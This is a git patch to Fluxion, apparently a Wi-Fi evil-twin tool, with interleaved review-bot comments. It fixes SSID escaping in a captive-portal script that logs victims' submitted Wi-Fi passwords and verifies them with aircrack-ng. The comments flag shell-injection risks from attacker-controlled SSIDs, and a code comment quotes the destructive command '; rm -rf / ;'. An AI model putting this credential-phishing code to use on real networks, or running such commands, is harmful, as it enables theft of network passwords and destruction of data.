From e3b9b720098f9a5adc8a5cb3f4da077192a15b34 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 22 Dec 2017 01:40:06 -0600 Subject: [PATCH] Fixed multiple bugs related to character escaping. Fixed a bug with the authenticator where the wrong SSID was displayed. Fixed a bug with the authenticator's network log, same as above. Fixed a bug with the hash path prompt, same as above. Added another character as candidate for SSID substitution (backslash). --- attacks/Captive Portal/attack.sh | 15 ++++++++------- attacks/Handshake Snooper/handshakes/test | 1 - fluxion.sh | 8 +++----- 3 files changed, 11 insertions(+), 13 deletions(-) delete mode 100644 attacks/Handshake Snooper/handshakes/test diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index a0ccb7e..8a13c88 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -641,7 +641,7 @@ while [ \$AuthenticatorState = \"running\" ]; do fi # Save any new password attempt. - cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC.log\" + cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\" # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" @@ -652,7 +652,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then + if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1 
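Review bot: The new `${APTargetSSIDClean//\"/\\\"}` in the `@@ -641` hunk escapes only double quotes, but the value is pasted into a double-quoted path in the text appended to captive_portal_authenticator.sh, where `$` and backticks are still expanded when that generated script runs. The SSID is chosen by whoever operates the access point, so it has to be treated as untrusted data here; the same inline expansion is repeated in the `@@ -652` and `@@ -739` hunks. I would compute the escaped form once before the echo blocks and reuse it, covering all four characters that are special inside double quotes, e.g. ``local cleanSSIDQuoted=$(printf '%s' "$APTargetSSIDClean" | sed 's/[\\"$`]/\\&/g')``. The enclosing function starts and ends outside these hunks.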
@@ -665,12 +665,13 @@ while [ \$AuthenticatorState = \"running\" ]; do fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi + local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" - echo -e \" SSID ...........: $CWht$APTargetSSIDEscaped$CClr\" + printf \" SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\" echo -e \" MAC ............: $CYel$APTargetMAC$CClr\" echo -e \" Channel ........: $CWht$APTargetChannel$CClr\" echo -e \" Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\" @@ -729,9 +730,9 @@ if [ ! -d \"$CaptivePortalNetLog\" ]; then fi echo \" -FLUXION $FLUXIONVersion +FLUXION $FLUXIONVersion.$FLUXIONRevision -SSID: $APTargetSSIDEscaped +SSID: \\\"$staticSSID\\\" BSSID: $APTargetMAC ($APTargetMaker) Channel: $APTargetChannel Security: $APTargetEncryption 
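Review bot: `staticSSID` in the `@@ -665` hunk is built with `printf "%q"`, whose output is meant to be re-read as an unquoted shell word, yet it is embedded between `\"…\"` in the generated script, and again as `SSID: \\\"$staticSSID\\\"` in the `@@ -729` hunk. Inside double quotes the backslashes that `%q` puts before characters such as `;`, `&` or `(` are kept, so those SSIDs would be displayed and logged with stray backslashes. When bash falls back to its `$'…'` form for non-printable bytes, a double quote in the SSID is, as far as I can tell, not escaped for a double-quoted context at all. Escaping only the characters that are special inside double quotes fits this use better: ``local staticSSID=$(printf '%s' "$APTargetSSID" | sed 's/[\\"$`]/\\&/g')``. A one-line comment above it stating which quoting context the value is prepared for would help the next reader.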
@@ -739,11 +740,11 @@ Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) Mac: $(captive_portal_get_IP_MAC) IP: $(captive_portal_get_client_IP) -\" >\"$CaptivePortalNetLog/$APTargetSSIDClean-$APTargetMAC.log\"" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" +\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" if [ $APRogueAuthMode = "hash" ]; then echo " -aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSIDClean-$APTargetMAC.log"$CClr"\"\ +aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\ " >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi diff --git a/attacks/Handshake Snooper/handshakes/test b/attacks/Handshake Snooper/handshakes/test deleted file mode 100644 index a9bf588..0000000 --- a/attacks/Handshake Snooper/handshakes/test +++ /dev/null @@ -1 +0,0 @@ -#!/bin/bash diff --git a/fluxion.sh b/fluxion.sh index 7070e5f..e56d3b5 100755 --- a/fluxion.sh +++ b/fluxion.sh 
@@ -694,10 +694,8 @@ function fluxion_set_target_ap() { # Notice: Why remove these? Because some smartass might decide to name their # network something like "; rm -rf / ;". If the string isn't sanitized accidentally # shit'll hit the fan and we'll have an extremely distressed person subit an issue. - # Removing: ' ', '/', '.', '~' - local strippedSSID=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~)+/_/g') - APTargetSSIDClean=$(printf "%q" "$strippedSSID") # Escape specials for safety. - APTargetSSIDEscaped=$(printf "%q" "$APTargetSSID") # Regular with escaped specials too. + # Removing: ' ', '/', '.', '~', '\' + APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g') # We'll change a single hex digit from the target AP's MAC address. # This new MAC address will be used as the rogue AP's MAC address. @@ -833,7 +831,7 @@ function fluxion_set_hash() { fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - echo -e "Path: ${CClr}$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" + printf "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] " read APTargetHashPathConsidered
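Review bot: With the `printf "%q"` step removed in the `@@ -694` hunk, the new `APTargetSSIDClean` assignment is a deny-list of five characters, so every other shell metacharacter in the SSID (`$`, backtick, `"`, `;`, `&`, an embedded newline) now reaches each place where the variable builds file names and generated script text. An allow-list is easier to reason about for a value that only has to be a safe file-name component: `APTargetSSIDClean=$(printf '%s' "$APTargetSSID" | LC_ALL=C tr -cs 'A-Za-z0-9_-' '_')`. Using `printf '%s'` also avoids `echo` treating an SSID such as `-n` or `-e` as an option. The comment above would then read `# Keeping only [A-Za-z0-9_-]; every other run of characters becomes '_'`. The body of fluxion_set_target_ap continues outside this hunk.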